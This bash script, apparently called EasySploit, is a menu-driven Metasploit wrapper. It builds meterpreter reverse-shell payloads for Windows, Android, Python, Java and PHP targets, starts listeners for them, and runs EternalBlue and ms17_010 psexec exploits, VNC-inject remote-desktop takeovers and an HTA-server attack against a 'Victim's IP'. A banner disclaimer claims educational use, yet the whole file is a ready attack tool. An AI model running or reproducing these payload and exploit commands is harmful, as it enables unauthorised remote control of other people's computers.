#!/bin/bash

# easysploit
i="0"
resize -s 27 80
clear
while [ $i -lt 1 ]
do
clear

ip=$(ipconfig getifaddr en0)
port = $port
if [ -n "$1" ]; then
    ip=$1
fi

if [ -n "$2" ]; then
    port=$2
fi

echo "IP: $ip"
echo "Port: $port"
echo -e '
     ______                 _____       __      _ __ 
    / ____/___ ________  __/ ___/____  / /___  (_) /_
   / __/ / __ `/ ___/ / / /\__ \/ __ \/ / __ \/ / __/
  / /___/ /_/ (__  ) /_/ /___/ / /_/ / / /_/ / / /_   v4.2
 /_____/\__,_/____/\__, //____/ .___/_/\____/_/\__/  (macOS)
                  /____/     /_/                        \e[1;34m
                                Created by "KALI LINUX TRICKS"
                                https://www.youtube.com/c/KALILINUXTRICKS\e[0m \e[1;31m

 Usage of EASYSPLOIT for attacking targets without prior mutual consent is
 ILLEGAL. Developers are not responsible for any damage caused by this script.
 EASYSPLOIT is intented ONLY FOR EDUCATIONAL PURPOSES!!! STAY LEGAL!!!
\e[1;32m
(1) Windows --> test.exe (payload and listener) 
(1x) Windows x64 --> test.exe (payload and listener) 
(2) Android --> test.apk (payload and listener)  
(3) Linux --> test.py (payload and listener) 
(4) MacOS --> test.jar (payload and listener)
(5) Web --> test.php (payload and listener)
(6) Scan if a target is vulnerable to ms17_010
(7) Exploit Windows 7/2008 x64 ONLY by IP (ms17_010_eternalblue)
(7rd) Enable Remote Desktop (ms17_010_eternalblue)
(8) Exploit Windows Vista/XP/2000/2003 ONLY by IP (ms17_010_psexec) 
(8rd) Enable Remote Desktop (ms17_010_psexec)
(9) Exploit Windows with a link (HTA Server)
(10) Contact with us - Our accounts
'
 
#service postgresql start
#msfdb start
exe='1'
win64='1x'
apk='2'
py='3'
jar='4' 
php='5'
scan='6'
eternalblue='7'
eternalbluerd='7rd'
psexec='8'
psexecrd='8rd'
hta='9'
me='10'



read x

if [ "$x" == "$exe" ]; then                    #EXE
msfvenom -p windows/meterpreter/reverse_tcp lhost=$ip lport=$port -f exe > ~/Downloads/test.exe
echo -e '

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!Your payload: ~/Downloads/test.exe!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

Waiting for listener...
 
'

msfconsole -q -x " use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp;  set lhost $ip ; set lport $port ; exploit ;"

elif [ "$x" == "$win64" ]; then   

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=$ip lport=$port -f exe > ~/Downloads/test_x64.exe
echo -e '

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!Your payload: ~/Downloads/test_x64.exe!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

Waiting for listener...
 
'

msfconsole -q -x " use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp;  set lhost $ip ; set lport $port ; exploit ;"

elif [ "$x" == "$apk" ]; then                          #APK
msfvenom -p android/meterpreter/reverse_tcp lhost=$ip lport=$port > ~/Downloads/test.apk
echo -e '

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!Your payload: ~/Downloads/test.apk!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

Waiting for listener...
 
'

msfconsole -q -x " use exploit/multi/handler; set payload android/meterpreter/reverse_tcp;  set lhost $ip ; set lport $port ; exploit ;"




elif [ "$x" == "$py" ]; then                       #PYTHON
msfvenom -p python/meterpreter/reverse_tcp lhost=$ip lport=$port > ~/Downloads/test.py
echo -e '

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!Your payload: ~/Downloads/test.py!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

Waiting for listener...
 
'

msfconsole -q -x " use exploit/multi/handler; set payload python/meterpreter/reverse_tcp;  set lhost $ip ; set lport $port ; exploit ;"



elif [ "$x" == "$jar" ]; then                        #JAVA
msfvenom -p java/meterpreter/reverse_tcp lhost=$ip lport=$port -f jar > ~/Downloads/test.jar
echo -e '

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!Your payload: ~/Downloads/test.jar!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

Waiting for listener...
 
'

msfconsole -q -x " use exploit/multi/handler; set payload java/meterpreter/reverse_tcp;  set lhost $ip ; set lport $port ; exploit ;"






elif [ "$x" == "$php" ]; then                        #PHP
msfvenom -p php/meterpreter/reverse_tcp lhost=$ip lport=$port > ~/Downloads/test.php
echo -e '

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!Your payload: ~/Downloads/test.php!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

Waiting for listener...
 
'

msfconsole -q -x " use exploit/multi/handler; set payload php/meterpreter/reverse_tcp;  set lhost $ip ; set lport $port ; exploit ;"




elif [ "$x" == "$scan" ]; then                        #SCAN
echo "Victim's IP:"
read r

msfconsole -q -x " use auxiliary/scanner/smb/smb_ms17_010; set rhosts $r ; exploit ;exit ;"
echo ' '
echo '           Press ENTER to Main Menu '
echo ' '
read


elif [ "$x" == "$eternalblue" ]; then                        #ETERNALBLUE
echo "Victim's IP:"
read r

msfconsole -q -x " use exploit/windows/smb/ms17_010_eternalblue; set payload windows/x64/meterpreter/reverse_tcp;  set lhost $ip ; set rhost $r ; exploit ; "



elif [ "$x" == "$eternalbluerd" ]; then                        #ETERNALBLUERD
echo "Victim's IP:"
read r

msfconsole -q -x " use exploit/windows/smb/ms17_010_eternalblue; set payload windows/x64/vncinject/reverse_tcp;  set lhost $ip ; set rhost $r ; set viewonly false ; exploit ; "




elif [ "$x" == "$psexec" ]; then                        #PSEXEC
echo "Victim's IP:" 
read r

msfconsole -q -x " use exploit/windows/smb/ms17_010_psexec; set lhost $ip ; set rhost $r ; exploit ;"


elif [ "$x" == "$psexecrd" ]; then                        #PSEXECRD
echo "Victim's IP:"
read r

msfconsole -q -x " use exploit/windows/smb/ms17_010_psexec; set payload windows/vncinject/reverse_tcp;  set lhost $ip ; set rhost $r ; set viewonly false ; exploit ; "



elif [ "$x" == "$hta" ]; then                        #HTA
echo 'Uripath: (/)'
read u
msfconsole -q -x " use exploit/windows/misc/hta_server; set srvhost $ip; set uripath /$u; set payload windows/meterpreter/reverse_tcp; set lhost $ip ; exploit ;"



elif [ "$x" == "$me" ]; then                 #CONTACT WITH ME                      

clear

echo -e '\e[1;33m

 mmmmmm   mm    mmmm m     m  mmmm  mmmmm  m       mmmm  mmmmm mmmmmmm
 #        ##   #"   " "m m"  #"   " #   "# #      m"  "m   #      #   
 #mmmmm  #  #  "#mmm   "#"   "#mmm  #mmm#" #      #    #   #      #   
 #       #mm#      "#   #        "# #      #      #    #   #      #   
 #mmmmm #    # "mmm#"   #    "mmm#" #      #mmmmm  #mm#  mm#mm    #  v4.2 \e[0m


 \e[1;31m
 https://www.youtube.com/c/KALILINUXTRICKS 
 \e[1;32m
 https://github.com/KALILINUXTRICKSYT
 \e[1;34m
 https://www.twitter.com/KALILINUXTRICKS
 \e[1;35m
 https://www.instagram.com/kali_linux_tricks_youtube
 \e[1;33m
 https://www.patreon.com/kalilinuxtricks
 \e[1;37m
 kalilinuxtricks@gmail.com


                          Press ENTER to Main Menu
'
read


else 

n


fi

done


